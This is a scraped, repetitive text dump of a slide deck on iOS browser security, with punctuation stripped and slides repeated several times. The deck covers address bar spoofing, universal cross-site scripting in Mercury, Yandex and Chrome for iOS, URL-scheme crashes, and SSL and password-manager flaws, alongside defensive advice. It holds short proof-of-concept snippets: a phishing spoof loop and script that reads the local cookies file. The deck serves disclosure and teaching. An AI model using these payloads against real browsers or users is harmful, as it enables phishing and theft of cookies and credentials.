bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 27: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/27.jpg)
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 28: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/28.jpg)
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
